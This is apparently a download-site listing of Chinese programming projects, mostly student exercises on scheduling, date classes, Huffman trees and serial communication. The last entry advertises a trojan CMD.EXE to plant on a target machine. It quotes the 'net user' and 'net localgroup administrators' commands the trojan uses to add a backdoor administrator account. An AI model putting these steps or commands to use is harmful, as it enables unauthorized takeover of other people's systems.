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[其他] 单片机

单片机串口通信例子。 如:1.在code中设置两个一维无符号字符型数组,数组共有5个元素,每按键一次,将数组数据发送一次。若P3.4=0,发送第1个数组数据,否则发送第2个数组数据。 2.与“1”配对,接收发送方的数据,接收经偶校验正确的数据放在20H-24H单元,接收后根据P3口拨码开关的值显示20H-24H单元的内容。P3.7P3.6P3.5P3.4=0000、0001、0010、0011、0100分别显示20H、21H、22H、23H、24H的值。
An example of serial communication of single chip microcomputer. Such as: 1. in the code set up two one-dimensional unsigned character array, the array has 5 elements, each button once, send the array data once. If P3.4=0, send first array data, otherwise send second array data. 2. and "1" pair, receive the sender's data, receive the correct data of the parity check in the 20H-24H unit, after receiving the value of the P3 port code switch to display the content of the 20H-24H unit. P3.7P3.6P3.5P3.4=0000, 0001, 0010, 0011 and 0100 show the values of 20H, 21H, 22H, 23H and 24H respectively. (2018-05-03, Visual C++, 256KB, 下载1次)


[其他] time

仿照日期类编写时间类CTime_t,可以完成时间的设置、运算、比较等功能。 增加时间的输入功能,既可以选择输入格式,可以输入hh:mm:ss格式的信息。 增加时间的输出格式,可以输出12小时的时间格式。编写时间和日期的派生类CDati,完成日期与时间的联合设置、运算、比较等功能,要求该派生类可以完成:日期时间加天数或时间等于新的日期时间,日期时间减天数或等于新的日期时间,两个日期时间相减等于天数或时间等工作,在程序中考虑闰年等具体情况,并重载各种运算符。
Date of class preparation time along the lines of class CTime_t, you can complete the time setting, computing, comparing and so on. Increase the time of the input function, which can select the input format, you can enter hh: mm: ss format information. Increase the time of the output format, you can output 12-hour time format. Time and date of writing derived classes CDati, completion date and Time of the joint set, operation, comparison functions, require that derived classes can be completed: date time plus time equals the number of days or a new Date, time, date and time minus the number of days equal to the new date or time, subtract two date time is equal to the number of days or hours, etc., in Process to consider the specific circumstances of such a leap year, and a variety of operator overloading. (2011-12-27, Visual C++, 1KB, 下载6次)


[其他] date

测试日期类成员函数,在主函数中列出菜单选项,可以完成日期的加减比较等测试功能。 完善程序功能,在日期相加的菜单选项中增加日期加天数,结果为新日期;日期家月份,结果为新日期,要考虑闰年情况。 完善程序功能,在日期相减的菜单选项中增加日期减天数,结果为新日期;日期减月份,结果为新日期,要考虑闰年情况。 显示日期时增加显示星期及英文形式的月份的功能。
Date of Test class member functions, listed in the main function menu options, the date of addition and subtraction can be done comparison testing. Improve the program features, the date the sum of the menu option to add date plus the number of days, the results for the new date date of the month at home, the result is a new date, leap year to consider the situation. Improve the program functions, date subtraction in the menu option to add the date by days, the results for the new date date by month, the results for the new date, leap year to consider the situation. Display shows the date when the increase in the weeks and months in English in the form of function. (2011-12-27, Visual C++, 2KB, 下载3次)


[其他] jincheng

模拟高优先权优先的进程调度算法 采用最高优先数优先的调度算法(即把处理机分配给优先数最高的进程),每个进程有一个进程控制块(PCB)表示。进程控制块可以包含如下信息:进程名、优先数、需要运行时间、已用CPU时间、进程状态等等。每个进程的状态可以是就绪W(Wait)、运行R(Run)、或完成F(Finish)三种状态之一。 进程的优先数及需要的运行时间可以事先人为地指定,进程的运行时间以时间片为单位进行计算。 就绪进程获得CPU后都只能运行一个时间片。用已占用CPU时间加1来表示。 如果运行一个时间片后,进程的已占用 CPU时间已达到所需要的运行时间,则撤消该进程,如果运行一个时间片后进程的已占用CPU时间还未达所需要的运行时间,也就是进程还需要继续运行,此时应将进程的优先数减1(即降低一级),然后把它插入就绪队列等待CPU。 每进行一次调度程序都打印一次运行进程、就绪队列、以及各个进程的 PCB,以便进行检查。 重复以上过程,直到所有进程都完成为止。
Simulation of high-priority process scheduling priority The highest priority by the number of priority scheduling algorithm (ie the number of processors allocated to the highest priority process), each process has a process control block (PCB) said. Process control block can contain the following information: process name, priority number, need to run time, CPU time has been used, the process of state and so on. The state of each process can be ready W (Wait), run the R (Run), or the completion of F (Finish) one of three states. Process priority number and needs of the running time can be specified in advance artificially, the process of running time to calculate the time-piece. Ready access to CPU process can only run one time after the film. CPU time has been occupied with a plus 1 to that. If you run a time slice, the process has been CPU-time has reached the required running time, then undo the process, if a time slice to run after the process has yet to take up CPU time to r (2010-04-06, Visual C++, 1661KB, 下载6次)


[其他] prcs_mngment

进程调度算法:采用最高优先数优先的调度算法(即把处理机分配给优先数最高的进程)。每个进程有一个进程控制块( PCB)表示。进程控制块可以包含如下信息:进程名、优先数、需要运行时间、已用CPU时间、进程状态等等。进程的优先数及需要的运行时间可以事先人为地指定(也可以由随机数产生)。每个进程的状态可以是就绪 W(Wait)、运行R(Run)、或完成F(Finish)三种状态之一。进程的运行时间以时间片为单位进行计算。就绪进程获得 CPU后都只能运行一个时间片。用已占用CPU时间加1来表示。 如果运行一个时间片后,进程的已占用 CPU时间已达到所需要的运行时间,则撤消该进程,如果运行一个时间片后进程的已占用CPU时间还未达所需要的运行时间,也就是进程还需要继续运行,此时应将进程的优先数减1(即降低一级),然后把它插入就绪队列等待CPU。每进行一次调度程序都打印一次运行进程、就绪队列、以及各个进程的 PCB,以便进行检查。重复以上过程,直到所要进程都完成为止。
Functional requirements: Process Scheduling Algorithm: A number of priority the highest priority scheduling algorithm (ie the number of processors allocated to the highest priority process). Each process has a process control block (PCB) said. Process control block may contain the following information: process name, priority number, need to run time, has spent CPU time, the process of the state and so on. The process priority number and needs of the running time can be artificially designated in advance (you can also by a random number generator). The state of each process can be ready W (Wait), run the R (Run), or the completion of F (Finish), one of three states. The process of running time to time slices are calculated as a unit. Ready access to CPU after the process can only run one time slice. CPU time has been occupied with the plus one indication of this. If you run one time slice, the process has taken the CPU time has reached the required run-time, then undo the process, if a (2010-01-04, Visual C++, 1KB, 下载5次)


[其他] SportMeeting

学生运动会成绩数据库 问题描述:学生运动会成绩数据库系统记录某校运动会上全部运动项目,各系获得的分数及排名的情况,包括50、100、200,400,1500米,跳高,跳远,标枪,铅球铁饼等。进入系统后可以输入和修改某个项目的结果情况,可以按各系院编号输出总分;按总分排序;按男团体总分排序 ;按系院编号查询;按项目编号查询;按女团体总分排序。 分步实施: 初步完成总体设计,搭好框架,确定人机对话的界面,确定函数个数; 完成最低要求:建立一个文件,包括某个系,5个项目的得分情况,能对文件中的信息进行扩充(追加),修改和删除; 进一步要求:完成对多个系,多个项目的得分排序,以及完成系统查询功能。有兴趣的同学可以自己扩充系统功能。 键盘输入:系院数目,男子项目数女子项目数,(每项目取前三名,分别为10,5,2分) 要求:1)界面友好,函数功能要划分好 2)总体设计应画一流程图 3)程序要加必要的注释 4)要提供程序测试方案 5)程序一定要经得起测试,宁可功能少一些,也要能运行起来,不能运行的程序是没有价值的。
Problem Description: Student Games results of a database system for recording all the sports, school sporting events, various departments to obtain scores and ranking, including 50,100,200,400,1500 meters, high jump, long jump, javelin, shot put, discus and so on. Entering the system can enter and modify the results of a project, you can output Total Number of Hospitals by various departments sorted by Total by male groups Total sort by the Department of School No. inquiries by item number search by women groups Total sort. (2009-08-29, Visual C++, 46KB, 下载114次)


[其他] 05605-19-

构造哈夫曼树 哈弗曼树中没有度为一的节点,是标准的二叉树,所以有n个叶子结点时,需要一个长度为2n-1的一维数组存储哈弗曼树的结点。 (1)、n个叶子节点只有weight权值,处理非叶子节点,从ht[i](ht[1]~ht[n-1])中找到ht[i].weight最小的两个节点ht[s1]和ht[s2],这就是Select(int n,int &s1,int & s2,HTNode *ht)函数完成的功能。 (2)、调用select函数,并将ht[s1]和ht[s2]作为ht[l]的左右子树,即ht[s1]和ht[s2]双亲节点为ht[l],新的根节点的权值为其左右子树权值之和, ht[l].weight=ht[s1].weight+ht[s2].weight
Huffman tree structure tree哈弗曼no degree 1 nodes, is a standard binary tree, there is a leaf node n, the need for a length of 2n-1 one-dimensional array of storage哈弗曼tree nodes. (1), n a leaf node, only the right to weight the value of treatment of non-leaf node, from ht [i] (ht [1] ~ ht [n-1]) found in ht [i]. Weight minimum of two nodes ht [s1] and ht [s2], This is the Select (int n, int (2008-05-06, Visual C++, 11KB, 下载3次)


[其他] suan_shu_biao_da_shi_qiu_zhi

1, 表达式一般由操作数(operand),运算符(operator)和界限符(delimiter)组成。操作数可以有常数,变量或者标识符。运算符分为算术运算符,关系运算符和逻辑运算符。基本界限符有左右括号和表达式结束符号。为了程序简单,仅讨论简单算术表达式的求值问题。这种表达式只含加,减,乘,除和四则运算符,括号以及结束符‘#’。 2, 算法基本思想:  建立两个栈:一个是操作数栈(Stack_nd),用以寄存操作数或运算结果;另一个是运算符栈(Stack_tr),用以寄存运算符和界限符。  依次读入表达式中的字符,若是操作数则压进操作数栈(Stack_nd),若是运算符,则与运算栈(Stack_tr)的栈顶元素比较优先级,根据比较的结果进行相应的操作。 3, 规定算符间的优先级;算符q1与q2至多是下面三种关系之一:  q1<q2 q1的优先权低于q2  q1=q2 q1的优先权等于 q2  q1>q2 q1的优先权高于 q2 (2008-03-25, Visual C++, 2KB, 下载11次)


[其他] 《软件加密技术内幕》[配套光盘]

this be supporting the CD. The book combines examples highlight of the software encryption technology, and its implementation program to help programmers to better protect their software. The book introduced the relevant knowledge of the underlying system, for example, PE format for in-depth analysis and debugging API application, but SEH undisclosed technology in-depth research, thus allowing readers to understand the underlying knowledge, can be applied to their own software to protect various programs, such as anti-tracking technology realization. The book is also the first time publicly how to prepare shell software, and how to shell and procedures for the integration of some other hot technology. The book by the encryption and decryption technology community together to create a first (2005-11-26, Visual C++, 9169KB, 下载447次)


[其他] cmd漏洞源代码

你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级
cmd loopholes in the source code (2004-07-09, Visual C++, 18KB, 下载58次)
